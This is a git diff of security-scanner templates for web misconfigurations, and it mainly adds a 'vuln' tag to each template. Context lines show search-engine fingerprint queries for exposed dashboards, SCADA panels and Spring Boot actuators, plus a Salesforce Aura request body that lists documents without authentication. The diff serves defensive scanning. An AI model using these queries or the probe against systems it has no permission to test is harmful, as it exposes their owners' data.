c2e4d88e4c3..6616d36bce9 100644 --- a/http/misconfiguration/redpanda-console.yaml +++ b/http/misconfiguration/redpanda-console.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"Redpanda Console" - tags: misconfig,redpanda,console,streaming + tags: misconfig,redpanda,console,streaming,vuln http: - method: GET diff --git a/http/misconfiguration/rekognition-image-validation.yaml b/http/misconfiguration/rekognition-image-validation.yaml index 76aaf8376d0..04ff8942ff6 100644 --- a/http/misconfiguration/rekognition-image-validation.yaml +++ b/http/misconfiguration/rekognition-image-validation.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Rekognition Image Validation Debug UI" - tags: misconfig,exposure + tags: misconfig,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/repetier-unauth.yaml b/http/misconfiguration/repetier-unauth.yaml index 7aad041ba73..caece8c2baf 100644 --- a/http/misconfiguration/repetier-unauth.yaml +++ b/http/misconfiguration/repetier-unauth.yaml @@ -15,7 +15,7 @@ info: product: repetier-server shodan-query: title:"Repetier-Server" fofa-query: title="repetier-server" - tags: repetier,dashboard,unauth,misconfig + tags: repetier,dashboard,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/request-baskets-exposure.yaml b/http/misconfiguration/request-baskets-exposure.yaml index 1f0a5a328c5..d4e7df292b9 100644 --- a/http/misconfiguration/request-baskets-exposure.yaml +++ b/http/misconfiguration/request-baskets-exposure.yaml @@ -16,7 +16,7 @@ info: vendor: rbaskets product: request_baskets shodan-query: html:"request-baskets" - tags: misconfig,requests-baskets,exposure + tags: misconfig,requests-baskets,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/rethinkdb-admin-console.yaml b/http/misconfiguration/rethinkdb-admin-console.yaml index 92392a44170..6341bc9380e 100644 --- a/http/misconfiguration/rethinkdb-admin-console.yaml +++ b/http/misconfiguration/rethinkdb-admin-console.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:969374472 - tags: misconfig,rethinkdb,console,dashboard + tags: misconfig,rethinkdb,console,dashboard,vuln http: - method: GET diff --git a/http/misconfiguration/root-path-disclosure.yaml b/http/misconfiguration/root-path-disclosure.yaml index ead0266f192..dc2a037cef8 100644 --- a/http/misconfiguration/root-path-disclosure.yaml +++ b/http/misconfiguration/root-path-disclosure.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 4 - tags: misconfig,exposure,info-leak,listing,lfr + tags: misconfig,exposure,info-leak,listing,lfr,vuln http: - method: GET diff --git a/http/misconfiguration/roxyfileman-fileupload.yaml b/http/misconfiguration/roxyfileman-fileupload.yaml index f0134f6043b..50bf8096775 100644 --- a/http/misconfiguration/roxyfileman-fileupload.yaml +++ b/http/misconfiguration/roxyfileman-fileupload.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 4 google-query: intitle:"Roxy file manager" - tags: misconfig,edb,roxy,fileman,rce,fileupload,intrusive + tags: misconfig,edb,roxy,fileman,rce,fileupload,intrusive,vuln http: - raw: diff --git a/http/misconfiguration/s3-torrent.yaml b/http/misconfiguration/s3-torrent.yaml index 33460d0ba2b..e5520f61607 100644 --- a/http/misconfiguration/s3-torrent.yaml +++ b/http/misconfiguration/s3-torrent.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: misconfig,aws,s3,bucket + tags: misconfig,aws,s3,bucket,vuln http: - method: GET diff --git a/http/misconfiguration/salesforce-aura.yaml b/http/misconfiguration/salesforce-aura.yaml index f6876d84e60..4f21ca58a5d 100644 --- a/http/misconfiguration/salesforce-aura.yaml +++ b/http/misconfiguration/salesforce-aura.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 5 - tags: aura,unauth,salesforce,exposure,misconfig + tags: aura,unauth,salesforce,exposure,misconfig,vuln http: - method: POST diff --git a/http/misconfiguration/salesforce-community-misconfig.yaml b/http/misconfiguration/salesforce-community-misconfig.yaml index b6b55c0116a..c28ef31056c 100644 --- a/http/misconfiguration/salesforce-community-misconfig.yaml +++ b/http/misconfiguration/salesforce-community-misconfig.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true publicwww-query: sfsites - tags: aura,unauth,salesforce,exposure,misconfig + tags: aura,unauth,salesforce,exposure,misconfig,vuln variables: actions: '{"actions":[{"id":"{{randstr}}","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"ContentDocument","layoutType":"FULL","pageSize":20,"currentPage":0,"useTimeout":false,"getCount":true,"enableRowActions":false}}]}' diff --git a/http/misconfiguration/sap/sap-directory-listing.yaml b/http/misconfiguration/sap/sap-directory-listing.yaml index c91de27b37e..51d4bf398b8 100644 --- a/http/misconfiguration/sap/sap-directory-listing.yaml +++ b/http/misconfiguration/sap/sap-directory-listing.yaml @@ -7,7 +7,7 @@ info: description: SAP Directory Listing is enabled. metadata: max-request: 1 - tags: sap,listing,misconfig + tags: sap,listing,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml index 53b451e12d5..c42929f84c4 100644 --- a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml +++ b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml @@ -14,7 +14,7 @@ info: product: content_server vendor: sap fofa-query: icon_hash=-266008933 - tags: sap,misconfig + tags: sap,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/sap/sap-public-admin.yaml b/http/misconfiguration/sap/sap-public-admin.yaml index de9f6c544e8..d78e55852cb 100644 --- a/http/misconfiguration/sap/sap-public-admin.yaml +++ b/http/misconfiguration/sap/sap-public-admin.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: html:"SAP" - tags: sap,misconfig,admin,dashboard + tags: sap,misconfig,admin,dashboard,vuln http: - method: GET diff --git a/http/misconfiguration/searchreplacedb2-exposure.yaml b/http/misconfiguration/searchreplacedb2-exposure.yaml index 1655a3c75ad..017c740beec 100644 --- a/http/misconfiguration/searchreplacedb2-exposure.yaml +++ b/http/misconfiguration/searchreplacedb2-exposure.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: html:"searchreplacedb2.php" fofa-query: body="searchreplacedb2.php" - tags: misconfig,searchreplacedb2,exposure + tags: misconfig,searchreplacedb2,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/secnet-info-leak.yaml b/http/misconfiguration/secnet-info-leak.yaml index 0a8934baf95..3a0e627aa3b 100644 --- a/http/misconfiguration/secnet-info-leak.yaml +++ b/http/misconfiguration/secnet-info-leak.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="安网-智能路由系统" || header="HTTPD_ac 1.0" - tags: info-leak,secnet,misconfig + tags: info-leak,secnet,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/seeyon-unauth.yaml b/http/misconfiguration/seeyon-unauth.yaml index 87651186b2c..b8c564d7cd0 100644 --- a/http/misconfiguration/seeyon-unauth.yaml +++ b/http/misconfiguration/seeyon-unauth.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 fofa-query: app="致远互联-OA" - tags: misconfig,seeyon,unauth + tags: misconfig,seeyon,unauth,vuln http: - raw: diff --git a/http/misconfiguration/selenium-exposure.yaml b/http/misconfiguration/selenium-exposure.yaml index 2903f1a9ac6..4ae8140de78 100644 --- a/http/misconfiguration/selenium-exposure.yaml +++ b/http/misconfiguration/selenium-exposure.yaml @@ -17,7 +17,7 @@ info: vendor: selenium product: selenium shodan-query: "/wd/hub" - tags: misconfig,selenium,misconfiguration,rce,chromium + tags: misconfig,selenium,misconfiguration,rce,chromium,vuln http: - method: GET diff --git a/http/misconfiguration/sentinel-license-monitor.yaml b/http/misconfiguration/sentinel-license-monitor.yaml index 54fb57220cb..9bdcc2b954d 100644 --- a/http/misconfiguration/sentinel-license-monitor.yaml +++ b/http/misconfiguration/sentinel-license-monitor.yaml @@ -12,7 +12,7 @@ info: vendor: trioniclabs product: sentinel shodan-query: html:"Sentinel License Monitor" - tags: misconfig,sentinel,license,monitor + tags: misconfig,sentinel,license,monitor,vuln http: - method: GET diff --git a/http/misconfiguration/seq-dashboard-unath.yaml b/http/misconfiguration/seq-dashboard-unath.yaml index ffd94ad1fa5..4ccae2e37bc 100644 --- a/http/misconfiguration/seq-dashboard-unath.yaml +++ b/http/misconfiguration/seq-dashboard-unath.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Seq" - tags: misconfig,exposure,seq,dashboard + tags: misconfig,exposure,seq,dashboard,vuln http: - method: GET diff --git a/http/misconfiguration/server-status.yaml b/http/misconfiguration/server-status.yaml index 484421cd2f9..23f4574da81 100644 --- a/http/misconfiguration/server-status.yaml +++ b/http/misconfiguration/server-status.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: title:"ServerStatus" - tags: misconfig,serverstatus + tags: misconfig,serverstatus,vuln http: - method: GET diff --git a/http/misconfiguration/service-pwd.yaml b/http/misconfiguration/service-pwd.yaml index 81989d557f1..0b636d1cb64 100644 --- a/http/misconfiguration/service-pwd.yaml +++ b/http/misconfiguration/service-pwd.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7256 metadata: max-request: 1 - tags: exposure,listing,service,edb,misconfig + tags: exposure,listing,service,edb,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/servicenow-title-injection.yaml b/http/misconfiguration/servicenow-title-injection.yaml index d3aaa25401e..f13ac8ba94a 100644 --- a/http/misconfiguration/servicenow-title-injection.yaml +++ b/http/misconfiguration/servicenow-title-injection.yaml @@ -20,7 +20,7 @@ info: - icon_hash=1701804003 - title="servicenow" google-query: intitle:"servicenow" - tags: cve,cve2024,servicenow,injection + tags: cve,cve2024,servicenow,injection,vuln http: - method: GET diff --git a/http/misconfiguration/servicenow-widget-misconfig.yaml b/http/misconfiguration/servicenow-widget-misconfig.yaml index d5f43622236..99dc6ea7f36 100644 --- a/http/misconfiguration/servicenow-widget-misconfig.yaml +++ b/http/misconfiguration/servicenow-widget-misconfig.yaml @@ -16,7 +16,7 @@ info: vendor: servicenow product: servicenow shodan-query: title:"servicenow" - tags: servicenow,widget,misconfig + tags: servicenow,widget,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/sftpgo-admin-setup.yaml b/http/misconfiguration/sftpgo-admin-setup.yaml index 60a401fdceb..45021b936a8 100644 --- a/http/misconfiguration/sftpgo-admin-setup.yaml +++ b/http/misconfiguration/sftpgo-admin-setup.yaml @@ -14,7 +14,7 @@ info: vendor: sftpgo_project product: sftpgo fofa-query: title="SFTPGo - Setup" - tags: sftpgo,misconfig,setup + tags: sftpgo,misconfig,setup,vuln http: - method: GET diff --git a/http/misconfiguration/shell-history.yaml b/http/misconfiguration/shell-history.yaml index ea5783c1a10..b44c8dae705 100644 --- a/http/misconfiguration/shell-history.yaml +++ b/http/misconfiguration/shell-history.yaml @@ -7,7 +7,7 @@ info: description: Discover history for bash, ksh, sh, and zsh metadata: max-request: 4 - tags: misconfig + tags: misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/shibboleth-open-redirect.yaml b/http/misconfiguration/shibboleth-open-redirect.yaml index 4d197619c7c..c238d06f01a 100644 --- a/http/misconfiguration/shibboleth-open-redirect.yaml +++ b/http/misconfiguration/shibboleth-open-redirect.yaml @@ -18,7 +18,7 @@ info: max-request: 1 verified: true shodan-query: html:"Shibboleth" - tags: redirect,shibboleth,misconfig + tags: redirect,shibboleth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/simatic-dashboard-exposed.yaml b/http/misconfiguration/simatic-dashboard-exposed.yaml index 3d49e1ab743..1665444a52c 100644 --- a/http/misconfiguration/simatic-dashboard-exposed.yaml +++ b/http/misconfiguration/simatic-dashboard-exposed.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"SIMATIC 300" - tags: siemens,simatic,plc,scada,iot,misconfig,unauth + tags: siemens,simatic,plc,scada,iot,misconfig,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/sitecore-debug-page.yaml b/http/misconfiguration/sitecore-debug-page.yaml index db7a7053aab..801c196b91d 100644 --- a/http/misconfiguration/sitecore-debug-page.yaml +++ b/http/misconfiguration/sitecore-debug-page.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to Sitecore" - tags: debug,sitecore,misconfig + tags: debug,sitecore,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/sitecore-lfi.yaml b/http/misconfiguration/sitecore-lfi.yaml index b678939348c..963dbd2acfc 100644 --- a/http/misconfiguration/sitecore-lfi.yaml +++ b/http/misconfiguration/sitecore-lfi.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: title:"Sitecore" - tags: sitecore,lfi,misconfig + tags: sitecore,lfi,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/skycaiji-install.yaml b/http/misconfiguration/skycaiji-install.yaml index 5bd4dfd0608..9a3074ea47c 100644 --- a/http/misconfiguration/skycaiji-install.yaml +++ b/http/misconfiguration/skycaiji-install.yaml @@ -7,7 +7,7 @@ info: description: SkyCaiji was discovered. metadata: max-request: 1 - tags: tech,skycaiji,exposure,misconfig + tags: tech,skycaiji,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/slurm-hpc-dashboard.yaml b/http/misconfiguration/slurm-hpc-dashboard.yaml index 7d694ab5aa4..e9c28289d6d 100644 --- a/http/misconfiguration/slurm-hpc-dashboard.yaml +++ b/http/misconfiguration/slurm-hpc-dashboard.yaml @@ -19,7 +19,7 @@ info: shodan-query: title:"Slurm HPC Dashboard" product: slurm vendor: schedmd - tags: misconfig,slurm,dashboard + tags: misconfig,slurm,dashboard,discovery http: - method: GET diff --git a/http/misconfiguration/smarterstats-setup.yaml b/http/misconfiguration/smarterstats-setup.yaml index f4108237f23..d3f9794d6c4 100644 --- a/http/misconfiguration/smarterstats-setup.yaml +++ b/http/misconfiguration/smarterstats-setup.yaml @@ -13,7 +13,7 @@ info: vendor: smartertools product: smarterstats shodan-query: title:"Welcome to SmarterStats!" - tags: misconfig,smarterstats,exposure + tags: misconfig,smarterstats,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/smokeping-grapher.yaml b/http/misconfiguration/smokeping-grapher.yaml index 8bd7066f215..f7af6091309 100644 --- a/http/misconfiguration/smokeping-grapher.yaml +++ b/http/misconfiguration/smokeping-grapher.yaml @@ -15,7 +15,7 @@ info: vendor: smokeping product: smokeping shodan-query: title:"SmokePing Latency Page for Network Latency Grapher" - tags: misconfig,smokeping,latency,grapher + tags: misconfig,smokeping,latency,grapher,vuln http: - method: GET diff --git a/http/misconfiguration/smtp4dev-interface-exposed.yaml b/http/misconfiguration/smtp4dev-interface-exposed.yaml index ad8c887982b..8dff5373f3f 100644 --- a/http/misconfiguration/smtp4dev-interface-exposed.yaml +++ b/http/misconfiguration/smtp4dev-interface-exposed.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"smtp4dev" - tags: smtp4dev,misconfig,exposure,mail,interface + tags: smtp4dev,misconfig,exposure,mail,interface,vuln http: - method: GET diff --git a/http/misconfiguration/solr-query-dashboard.yaml b/http/misconfiguration/solr-query-dashboard.yaml index 75e24dbc1a4..95adc13c81d 100644 --- a/http/misconfiguration/solr-query-dashboard.yaml +++ b/http/misconfiguration/solr-query-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 2 vendor: apache product: solr - tags: solr,unauth,edb,misconfig + tags: solr,unauth,edb,misconfig,discovery http: - method: GET diff --git a/http/misconfiguration/sonarqube-projects-disclosure.yaml b/http/misconfiguration/sonarqube-projects-disclosure.yaml index dc34bd455bb..f60d3f65aeb 100644 --- a/http/misconfiguration/sonarqube-projects-disclosure.yaml +++ b/http/misconfiguration/sonarqube-projects-disclosure.yaml @@ -18,7 +18,7 @@ info: product: sonarqube shodan-query: title:"Sonarqube" fofa-query: app="sonarQube-代码管理" - tags: sonarqube,exposure,misconfig + tags: sonarqube,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/sonarqube-public-projects.yaml b/http/misconfiguration/sonarqube-public-projects.yaml index 0d7994ba744..40d2d6e275d 100644 --- a/http/misconfiguration/sonarqube-public-projects.yaml +++ b/http/misconfiguration/sonarqube-public-projects.yaml @@ -9,7 +9,7 @@ info: - https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true metadata: max-request: 1 - tags: sonarqube,misconfig + tags: sonarqube,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/sonarr-dashboard-unauth.yaml b/http/misconfiguration/sonarr-dashboard-unauth.yaml index 1c7cdba90cb..b710be31d33 100644 --- a/http/misconfiguration/sonarr-dashboard-unauth.yaml +++ b/http/misconfiguration/sonarr-dashboard-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"sonarr" - tags: sonarr,unauth,misconfig + tags: sonarr,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/sony-bravia-disclosure.yaml b/http/misconfiguration/sony-bravia-disclosure.yaml index 73a8c7f0839..6c5ec5232b0 100644 --- a/http/misconfiguration/sony-bravia-disclosure.yaml +++ b/http/misconfiguration/sony-bravia-disclosure.yaml @@ -11,7 +11,7 @@ info: - https://www.zeroscience.mk/codes/sonybravia_sysinfo.txt metadata: max-request: 1 - tags: misconfig,sony,unauth,exposure + tags: misconfig,sony,unauth,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/sound4-directory-listing.yaml b/http/misconfiguration/sound4-directory-listing.yaml index c7bf9847e80..4c83026d6f7 100644 --- a/http/misconfiguration/sound4-directory-listing.yaml +++ b/http/misconfiguration/sound4-directory-listing.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"SOUND4" - tags: misconfig,listing,sound4,disclosure,packetstorm + tags: misconfig,listing,sound4,disclosure,packetstorm,vuln http: - method: GET diff --git a/http/misconfiguration/spark-webui-unauth.yaml b/http/misconfiguration/spark-webui-unauth.yaml index 1ed22eb612c..35904ebedad 100644 --- a/http/misconfiguration/spark-webui-unauth.yaml +++ b/http/misconfiguration/spark-webui-unauth.yaml @@ -9,7 +9,7 @@ info: - https://github.com/vulhub/vulhub/tree/master/spark/unacc metadata: max-request: 1 - tags: unauth,vulhub,spark,misconfig + tags: unauth,vulhub,spark,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/spidercontrol-scada-server-info.yaml b/http/misconfiguration/spidercontrol-scada-server-info.yaml index b69580a1923..2547f6f7a1e 100644 --- a/http/misconfiguration/spidercontrol-scada-server-info.yaml +++ b/http/misconfiguration/spidercontrol-scada-server-info.yaml @@ -9,7 +9,7 @@ info: - https://spidercontrol.net/spidercontrol-inside/ metadata: max-request: 1 - tags: spidercontrol,scada,exposure,misconfig + tags: spidercontrol,scada,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/spring-eureka.yaml b/http/misconfiguration/springboot/spring-eureka.yaml index b3613bf3652..0b690e28d3d 100644 --- a/http/misconfiguration/springboot/spring-eureka.yaml +++ b/http/misconfiguration/springboot/spring-eureka.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure,eureka + tags: misconfig,springboot,exposure,eureka,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-auditevents.yaml b/http/misconfiguration/springboot/springboot-auditevents.yaml index c1db3d63619..e38d4746e5e 100644 --- a/http/misconfiguration/springboot/springboot-auditevents.yaml +++ b/http/misconfiguration/springboot/springboot-auditevents.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"Eureka" product: spring_boot vendor: vmware - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-autoconfig.yaml b/http/misconfiguration/springboot/springboot-autoconfig.yaml index eb3e712492e..daa0111dd57 100644 --- a/http/misconfiguration/springboot/springboot-autoconfig.yaml +++ b/http/misconfiguration/springboot/springboot-autoconfig.yaml @@ -7,7 +7,7 @@ info: description: Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. metadata: max-request: 2 - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-beans.yaml b/http/misconfiguration/springboot/springboot-beans.yaml index 68bc011d679..b9aef17af8b 100644 --- a/http/misconfiguration/springboot/springboot-beans.yaml +++ b/http/misconfiguration/springboot/springboot-beans.yaml @@ -7,7 +7,7 @@ info: description: Displays a complete list of all the Spring beans in the application metadata: max-request: 2 - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-caches.yaml b/http/misconfiguration/springboot/springboot-caches.yaml index 2be518a9f57..310864dde1d 100644 --- a/http/misconfiguration/springboot/springboot-caches.yaml +++ b/http/misconfiguration/springboot/springboot-caches.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 2 - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-conditions.yaml b/http/misconfiguration/springboot/springboot-conditions.yaml index dfeccc67e41..aa5c245b5b7 100644 --- a/http/misconfiguration/springboot/springboot-conditions.yaml +++ b/http/misconfiguration/springboot/springboot-conditions.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 2 shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-configprops.yaml b/http/misconfiguration/springboot/springboot-configprops.yaml index 8702e31713f..b6d407a7e6b 100644 --- a/http/misconfiguration/springboot/springboot-configprops.yaml +++ b/http/misconfiguration/springboot/springboot-configprops.yaml @@ -7,7 +7,7 @@ info: description: Sensitive environment variables may not be masked metadata: max-request: 2 - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-dump.yaml b/http/misconfiguration/springboot/springboot-dump.yaml index 2546c2e45ab..9a4f5e17144 100644 --- a/http/misconfiguration/springboot/springboot-dump.yaml +++ b/http/misconfiguration/springboot/springboot-dump.yaml @@ -7,7 +7,7 @@ info: description: Performs a thread dump metadata: max-request: 2 - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-env.yaml b/http/misconfiguration/springboot/springboot-env.yaml index 91964ca20a3..095167122e1 100644 --- a/http/misconfiguration/springboot/springboot-env.yaml +++ b/http/misconfiguration/springboot/springboot-env.yaml @@ -7,7 +7,7 @@ info: description: Sensitive environment variables may not be masked metadata: max-request: 4 - tags: misconfig,springboot,env,exposure + tags: misconfig,springboot,env,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-features.yaml b/http/misconfiguration/springboot/springboot-features.yaml index 82e72182993..785aa926c4b 100644 --- a/http/misconfiguration/springboot/springboot-features.yaml +++ b/http/misconfiguration/springboot/springboot-features.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 2 shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-flyway.yaml b/http/misconfiguration/springboot/springboot-flyway.yaml index ff8a8f9c939..5fe1df2a4e6 100644 --- a/http/misconfiguration/springboot/springboot-flyway.yaml +++ b/http/misconfiguration/springboot/springboot-flyway.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 2 - tags: misconfig,springboot,exposure,flyway + tags: misconfig,springboot,exposure,flyway,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-gateway.yaml b/http/misconfiguration/springboot/springboot-gateway.yaml index 915d46f5b8d..44e2963f597 100644 --- a/http/misconfiguration/springboot/springboot-gateway.yaml +++ b/http/misconfiguration/springboot/springboot-gateway.yaml @@ -9,7 +9,7 @@ info: - https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/ metadata: max-request: 2 - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-health.yaml b/http/misconfiguration/springboot/springboot-health.yaml index 12824bd3130..dd1ca1a057b 100644 --- a/http/misconfiguration/springboot/springboot-health.yaml +++ b/http/misconfiguration/springboot/springboot-health.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 2 verified: true - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-heapdump.yaml b/http/misconfiguration/springboot/springboot-heapdump.yaml index e5bae92cf18..1cf0b679de3 100644 --- a/http/misconfiguration/springboot/springboot-heapdump.yaml +++ b/http/misconfiguration/springboot/springboot-heapdump.yaml @@ -10,7 +10,7 @@ info: - https://github.com/pyn3rd/Spring-Boot-Vulnerability metadata: max-request: 3 - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln variables: str: "{{rand_base(6)}}" diff --git a/http/misconfiguration/springboot/springboot-httptrace.yaml b/http/misconfiguration/springboot/springboot-httptrace.yaml index ff2fc56b63f..d75c7c73803 100644 --- a/http/misconfiguration/springboot/springboot-httptrace.yaml +++ b/http/misconfiguration/springboot/springboot-httptrace.yaml @@ -7,7 +7,7 @@ info: description: View recent HTTP requests and responses metadata: max-request: 2 - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-info.yaml b/http/misconfiguration/springboot/springboot-info.yaml index 831fbc61bee..32c4e93bf65 100644 --- a/http/misconfiguration/springboot/springboot-info.yaml +++ b/http/misconfiguration/springboot/springboot-info.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 4 verified: true - tags: springboot,misconfig + tags: springboot,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-integrationgraph.yaml b/http/misconfiguration/springboot/springboot-integrationgraph.yaml index f2da28a21a8..c751400beb6 100644 --- a/http/misconfiguration/springboot/springboot-integrationgraph.yaml +++ b/http/misconfiguration/springboot/springboot-integrationgraph.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 2 - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-jolokia.yaml b/http/misconfiguration/springboot/springboot-jolokia.yaml index 5933c1a423b..7e04f2e0ffb 100644 --- a/http/misconfiguration/springboot/springboot-jolokia.yaml +++ b/http/misconfiguration/springboot/springboot-jolokia.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 2 shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-liquidbase.yaml b/http/misconfiguration/springboot/springboot-liquidbase.yaml index 9986adf85d8..eba20d51c27 100644 --- a/http/misconfiguration/springboot/springboot-liquidbase.yaml +++ b/http/misconfiguration/springboot/springboot-liquidbase.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 2 - tags: misconfig,springboot,exposure,liquibase + tags: misconfig,springboot,exposure,liquibase,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-logfile.yaml b/http/misconfiguration/springboot/springboot-logfile.yaml index 583cb85dc93..14300258121 100644 --- a/http/misconfiguration/springboot/springboot-logfile.yaml +++ b/http/misconfiguration/springboot/springboot-logfile.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 3 shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-loggerconfig.yaml b/http/misconfiguration/springboot/springboot-loggerconfig.yaml index 12a9478fac5..edc90bc2853 100644 --- a/http/misconfiguration/springboot/springboot-loggerconfig.yaml +++ b/http/misconfiguration/springboot/springboot-loggerconfig.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 2 shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-loggers.yaml b/http/misconfiguration/springboot/springboot-loggers.yaml index 578f5f4ac9e..51741c53499 100644 --- a/http/misconfiguration/springboot/springboot-loggers.yaml +++ b/http/misconfiguration/springboot/springboot-loggers.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 2 verified: true - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-mappings.yaml b/http/misconfiguration/springboot/springboot-mappings.yaml index d5877001529..52e87a299c5 100644 --- a/http/misconfiguration/springboot/springboot-mappings.yaml +++ b/http/misconfiguration/springboot/springboot-mappings.yaml @@ -7,7 +7,7 @@ info: description: Additional routes may be displayed metadata: max-request: 2 - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-metrics.yaml b/http/misconfiguration/springboot/springboot-metrics.yaml index ac01ef4a452..40f545847fe 100644 --- a/http/misconfiguration/springboot/springboot-metrics.yaml +++ b/http/misconfiguration/springboot/springboot-metrics.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 2 - tags: springboot,exposure,misconfig + tags: springboot,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-scheduledtasks.yaml 